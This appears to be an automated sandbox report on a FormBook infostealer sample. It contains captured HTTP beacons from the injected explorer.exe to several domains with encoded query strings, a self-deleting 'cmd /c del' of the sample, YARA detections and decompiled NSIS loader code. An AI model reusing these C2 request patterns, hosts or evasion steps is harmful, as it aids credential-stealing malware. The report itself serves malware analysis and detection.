                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "609953da-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49767 | Destination IP: 209.222.96.146 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 12, 2021 20:03:53.476977110 CEST | kBytes transferred: 6022 | Direction: OUT | Data:
GET /or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.nobleandmarble.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
Timestamp: May 12, 2021 20:03:53.613686085 CEST | kBytes transferred: 6022 | Direction: IN | Data:
HTTP/1.1 302 Found
                                                                                  Date: Wed, 12 May 2021 18:03:53 GMT
                                                                                  Server: Apache
                                                                                  Location: http://www.nobleandmarble.com/cgi-sys/suspendedpage.cgi?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP
                                                                                  Content-Length: 345
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.nobleandmarble.com/cgi-sys/suspendedpage.cgi?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&amp;4h_HCv=a2JDa0Xx22IpWxjP">here</a>.</p></body></html>


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49768 | Destination IP: 23.227.38.74 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 12, 2021 20:04:03.782355070 CEST | kBytes transferred: 6024 | Direction: OUT | Data:
GET /or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.safegrinder.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
Timestamp: May 12, 2021 20:04:04.026160002 CEST | kBytes transferred: 6026 | Direction: IN | Data:
HTTP/1.1 403 Forbidden
                                                                                  Date: Wed, 12 May 2021 18:04:04 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  X-Sorting-Hat-PodId: 156
                                                                                  X-Sorting-Hat-ShopId: 46831239325
                                                                                  X-Dc: gcp-us-central1
                                                                                  X-Request-ID: e6a60d92-4f25-4e5a-82cb-4009d2ef67ba
                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  X-Download-Options: noopen
                                                                                  X-Content-Type-Options: nosniff
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  cf-request-id: 0a035919650000c2ef55899000000001
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 64e5913bdf2cc2ef-FRA
                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig
May 12, 2021 20:04:04.026191950 CEST | 6027 | IN |
                                                                                  Data Ascii: ht:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-bloc
May 12, 2021 20:04:04.026207924 CEST | 6028 | IN |
                                                                                  Data Ascii: para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
May 12, 2021 20:04:04.026223898 CEST | 6030 | IN |
                                                                                  Data Ascii: itle": " ", "content-title": " " }, "ja": { "tit
May 12, 2021 20:04:04.026237011 CEST | 6030 | IN |
                                                                                  Data Ascii: s = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } //
May 12, 2021 20:04:04.026252985 CEST | 6030 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.4 | 49771 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 20:04:09.156018019 CEST | 6049 | OUT | GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ HTTP/1.1
                                                                                  Host: www.tecquestrian.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
May 12, 2021 20:04:09.293071032 CEST | 6050 | IN | HTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:04:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "60995c49-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  System Behavior

                                                                                  General

                                                                                  Start time:20:02:19
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:418969 bytes
                                                                                  MD5 hash:1CEC9342AC2C1F91201DF672382672F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:20:02:20
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:418969 bytes
                                                                                  MD5 hash:1CEC9342AC2C1F91201DF672382672F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:20:02:25
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:
                                                                                  Imagebase:0x7ff6fee60000
                                                                                  File size:3933184 bytes
                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:20:02:40
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                  Imagebase:0x11c0000
                                                                                  File size:78848 bytes
                                                                                  MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:20:02:44
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:/c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
                                                                                  Imagebase:0x11d0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:20:02:44
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                    Executed Functions

                                                                                    C-Code - Quality: 86%
                                                                                    			_entry_() {
                                                                                    				signed int _t42;
                                                                                    				intOrPtr* _t47;
                                                                                    				CHAR* _t51;
                                                                                    				char* _t53;
                                                                                    				CHAR* _t55;
                                                                                    				void* _t59;
                                                                                    				intOrPtr _t61;
                                                                                    				int _t63;
                                                                                    				int _t66;
                                                                                    				signed int _t67;
                                                                                    				int _t68;
                                                                                    				signed int _t70;
                                                                                    				void* _t94;
                                                                                    				signed int _t110;
                                                                                    				void* _t113;
                                                                                    				void* _t118;
                                                                                    				intOrPtr* _t119;
                                                                                    				char _t122;
                                                                                    				signed int _t141;
                                                                                    				signed int _t142;
                                                                                    				int _t150;
                                                                                    				void* _t151;
                                                                                    				intOrPtr* _t153;
                                                                                    				CHAR* _t156;
                                                                                    				CHAR* _t157;
                                                                                    				void* _t159;
                                                                                    				char* _t160;
                                                                                    				void* _t163;
                                                                                    				void* _t164;
                                                                                    				char _t189;
                                                                                    
                                                                                    				 *(_t164 + 0x18) = 0;
                                                                                    				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                    				 *(_t164 + 0x20) = 0;
                                                                                    				 *(_t164 + 0x14) = 0x20;
                                                                                    				SetErrorMode(0x8001); // executed
                                                                                    				_t42 = GetVersion() & 0xbfffffff;
                                                                                    				 *0x42f42c = _t42;
                                                                                    				if(_t42 != 6) {
                                                                                    					_t119 = E00406500(0);
                                                                                    					if(_t119 != 0) {
                                                                                    						 *_t119(0xc00);
                                                                                    					}
                                                                                    				}
                                                                                    				_t156 = "UXTHEME";
                                                                                    				do {
                                                                                    					E00406492(_t156); // executed
                                                                                    					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                                                                    				} while ( *_t156 != 0);
                                                                                    				E00406500(0xb);
                                                                                    				 *0x42f424 = E00406500(9);
                                                                                    				_t47 = E00406500(7);
                                                                                    				if(_t47 != 0) {
                                                                                    					_t47 =  *_t47(0x1e);
                                                                                    					if(_t47 != 0) {
                                                                                    						 *0x42f42f =  *0x42f42f | 0x00000040;
                                                                                    					}
                                                                                    				}
                                                                                    				__imp__#17(_t159);
                                                                                    				__imp__OleInitialize(0); // executed
                                                                                    				 *0x42f4f8 = _t47;
                                                                                    				SHGetFileInfoA(0x429850, 0, _t164 + 0x38, 0x160, 0); // executed
                                                                                    				E004060F7("arability Setup", "NSIS Error");
                                                                                    				_t51 = GetCommandLineA();
                                                                                    				_t160 = "\"C:\\Users\\jones\\Desktop\\1cec9342_by_Libranalysis.exe\" ";
                                                                                    				E004060F7(_t160, _t51);
                                                                                    				 *0x42f420 = 0x400000;
                                                                                    				_t53 = _t160;
                                                                                    				if("\"C:\\Users\\jones\\Desktop\\1cec9342_by_Libranalysis.exe\" " == 0x22) {
                                                                                    					 *(_t164 + 0x14) = 0x22;
                                                                                    					_t53 =  &M00435001;
                                                                                    				}
                                                                                    				_t55 = CharNextA(E00405ABA(_t53,  *(_t164 + 0x14)));
                                                                                    				 *(_t164 + 0x1c) = _t55;
                                                                                    				while(1) {
                                                                                    					_t122 =  *_t55;
                                                                                    					_t172 = _t122;
                                                                                    					if(_t122 == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags = _t122 - 0x20;
                                                                                    					if(_t122 != 0x20) {
                                                                                    						L13:
                                                                                    						__eflags =  *_t55 - 0x22;
                                                                                    						 *(_t164 + 0x14) = 0x20;
                                                                                    						if( *_t55 == 0x22) {
                                                                                    							_t55 =  &(_t55[1]);
                                                                                    							__eflags = _t55;
                                                                                    							 *(_t164 + 0x14) = 0x22;
                                                                                    						}
                                                                                    						__eflags =  *_t55 - 0x2f;
                                                                                    						if( *_t55 != 0x2f) {
                                                                                    							L25:
                                                                                    							_t55 = E00405ABA(_t55,  *(_t164 + 0x14));
                                                                                    							__eflags =  *_t55 - 0x22;
                                                                                    							if(__eflags == 0) {
                                                                                    								_t55 =  &(_t55[1]);
                                                                                    								__eflags = _t55;
                                                                                    							}
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							_t55 =  &(_t55[1]);
                                                                                    							__eflags =  *_t55 - 0x53;
                                                                                    							if( *_t55 != 0x53) {
                                                                                    								L20:
                                                                                    								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                                                                                    								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                                                                                    									L24:
                                                                                    									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                                                                                    									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                                                                                    										 *((char*)(_t55 - 2)) = 0;
                                                                                    										__eflags =  &(_t55[2]);
                                                                                    										E004060F7("C:\\Users\\jones\\AppData\\Local\\Temp",  &(_t55[2]));
                                                                                    										L30:
                                                                                    										_t157 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                                    										GetTempPathA(0x400, _t157); // executed
                                                                                    										_t59 = E00403317(_t172);
                                                                                    										_t173 = _t59;
                                                                                    										if(_t59 != 0) {
                                                                                    											L33:
                                                                                    											DeleteFileA("1033"); // executed
                                                                                    											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
                                                                                    											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                                                                    											if(_t61 != 0) {
                                                                                    												L43:
                                                                                    												E00403830();
                                                                                    												__imp__OleUninitialize();
                                                                                    												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                                                                    												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                                                                    													__eflags =  *0x42f4d4;
                                                                                    													if( *0x42f4d4 == 0) {
                                                                                    														L67:
                                                                                    														_t63 =  *0x42f4ec;
                                                                                    														__eflags = _t63 - 0xffffffff;
                                                                                    														if(_t63 != 0xffffffff) {
                                                                                    															 *(_t164 + 0x14) = _t63;
                                                                                    														}
                                                                                    														ExitProcess( *(_t164 + 0x14));
                                                                                    													}
                                                                                    													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                                                                    													__eflags = _t66;
                                                                                    													_t150 = 2;
                                                                                    													if(_t66 != 0) {
                                                                                    														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                                                                    														 *(_t164 + 0x38) = 1;
                                                                                    														 *(_t164 + 0x44) = _t150;
                                                                                    														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                                                                    													}
                                                                                    													_t67 = E00406500(4);
                                                                                    													__eflags = _t67;
                                                                                    													if(_t67 == 0) {
                                                                                    														L65:
                                                                                    														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                                                                    														__eflags = _t68;
                                                                                    														if(_t68 != 0) {
                                                                                    															goto L67;
                                                                                    														}
                                                                                    														goto L66;
                                                                                    													} else {
                                                                                    														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                                                                    														__eflags = _t70;
                                                                                    														if(_t70 == 0) {
                                                                                    															L66:
                                                                                    															E0040140B(9);
                                                                                    															goto L67;
                                                                                    														}
                                                                                    														goto L65;
                                                                                    													}
                                                                                    												}
                                                                                    												E00405813( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                                                                    												ExitProcess(2);
                                                                                    											}
                                                                                    											if( *0x42f440 == 0) {
                                                                                    												L42:
                                                                                    												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
                                                                                    												 *(_t164 + 0x18) = E0040390A( *0x42f4ec);
                                                                                    												goto L43;
                                                                                    											}
                                                                                    											_t153 = E00405ABA(_t160, 0);
                                                                                    											if(_t153 < _t160) {
                                                                                    												L39:
                                                                                    												_t182 = _t153 - _t160;
                                                                                    												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                                                                    												if(_t153 < _t160) {
                                                                                    													_t151 = E0040577E(_t185);
                                                                                    													lstrcatA(_t157, "~nsu");
                                                                                    													if(_t151 != 0) {
                                                                                    														lstrcatA(_t157, "A");
                                                                                    													}
                                                                                    													lstrcatA(_t157, ".tmp");
                                                                                    													_t162 = "C:\\Users\\jones\\Desktop";
                                                                                    													if(lstrcmpiA(_t157, "C:\\Users\\jones\\Desktop") != 0) {
                                                                                    														_push(_t157);
                                                                                    														if(_t151 == 0) {
                                                                                    															E00405761();
                                                                                    														} else {
                                                                                    															E004056E4();
                                                                                    														}
                                                                                    														SetCurrentDirectoryA(_t157);
                                                                                    														_t189 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                                                                                    														if(_t189 == 0) {
                                                                                    															E004060F7("C:\\Users\\jones\\AppData\\Local\\Temp", _t162);
                                                                                    														}
                                                                                    														E004060F7(0x430000,  *(_t164 + 0x1c));
                                                                                    														_t137 = "A";
                                                                                    														_t163 = 0x1a;
                                                                                    														 *0x430400 = "A";
                                                                                    														do {
                                                                                    															E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
                                                                                    															DeleteFileA(0x429450);
                                                                                    															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\1cec9342_by_Libranalysis.exe", 0x429450, 1) != 0) {
                                                                                    																E00405ED6(_t137, 0x429450, 0);
                                                                                    																E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
                                                                                    																_t94 = E00405796(0x429450);
                                                                                    																if(_t94 != 0) {
                                                                                    																	CloseHandle(_t94);
                                                                                    																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                                    																}
                                                                                    															}
                                                                                    															 *0x430400 =  *0x430400 + 1;
                                                                                    															_t163 = _t163 - 1;
                                                                                    														} while (_t163 != 0);
                                                                                    														E00405ED6(_t137, _t157, 0);
                                                                                    													}
                                                                                    													goto L43;
                                                                                    												}
                                                                                    												 *_t153 = 0;
                                                                                    												_t154 = _t153 + 4;
                                                                                    												if(E00405B7D(_t182, _t153 + 4) == 0) {
                                                                                    													goto L43;
                                                                                    												}
                                                                                    												E004060F7("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
                                                                                    												E004060F7("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
                                                                                    												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                                    												goto L42;
                                                                                    											}
                                                                                    											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                                                                    											while( *_t153 != _t110) {
                                                                                    												_t153 = _t153 - 1;
                                                                                    												if(_t153 >= _t160) {
                                                                                    													continue;
                                                                                    												}
                                                                                    												goto L39;
                                                                                    											}
                                                                                    											goto L39;
                                                                                    										}
                                                                                    										GetWindowsDirectoryA(_t157, 0x3fb);
                                                                                    										lstrcatA(_t157, "\\Temp");
                                                                                    										_t113 = E00403317(_t173);
                                                                                    										_t174 = _t113;
                                                                                    										if(_t113 != 0) {
                                                                                    											goto L33;
                                                                                    										}
                                                                                    										GetTempPathA(0x3fc, _t157);
                                                                                    										lstrcatA(_t157, "Low");
                                                                                    										SetEnvironmentVariableA("TEMP", _t157);
                                                                                    										SetEnvironmentVariableA("TMP", _t157);
                                                                                    										_t118 = E00403317(_t174);
                                                                                    										_t175 = _t118;
                                                                                    										if(_t118 == 0) {
                                                                                    											goto L43;
                                                                                    										}
                                                                                    										goto L33;
                                                                                    									}
                                                                                    									goto L25;
                                                                                    								}
                                                                                    								_t141 = _t55[4];
                                                                                    								__eflags = _t141 - 0x20;
                                                                                    								if(_t141 == 0x20) {
                                                                                    									L23:
                                                                                    									_t15 = _t164 + 0x20;
                                                                                    									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                                                                    									__eflags =  *_t15;
                                                                                    									goto L24;
                                                                                    								}
                                                                                    								__eflags = _t141;
                                                                                    								if(_t141 != 0) {
                                                                                    									goto L24;
                                                                                    								}
                                                                                    								goto L23;
                                                                                    							}
                                                                                    							_t142 = _t55[1];
                                                                                    							__eflags = _t142 - 0x20;
                                                                                    							if(_t142 == 0x20) {
                                                                                    								L19:
                                                                                    								 *0x42f4e0 = 1;
                                                                                    								goto L20;
                                                                                    							}
                                                                                    							__eflags = _t142;
                                                                                    							if(_t142 != 0) {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    							goto L19;
                                                                                    						}
                                                                                    					} else {
                                                                                    						goto L12;
                                                                                    					}
                                                                                    					do {
                                                                                    						L12:
                                                                                    						_t55 =  &(_t55[1]);
                                                                                    						__eflags =  *_t55 - 0x20;
                                                                                    					} while ( *_t55 == 0x20);
                                                                                    					goto L13;
                                                                                    				}
                                                                                    				goto L30;
                                                                                    			}


































                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE ref: 0040336D
                                                                                    • GetVersion.KERNEL32 ref: 00403373
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                                    • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                                    • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                                    • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                                    • GetCommandLineA.KERNEL32(arability Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,00000020,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                                    • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                                      • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
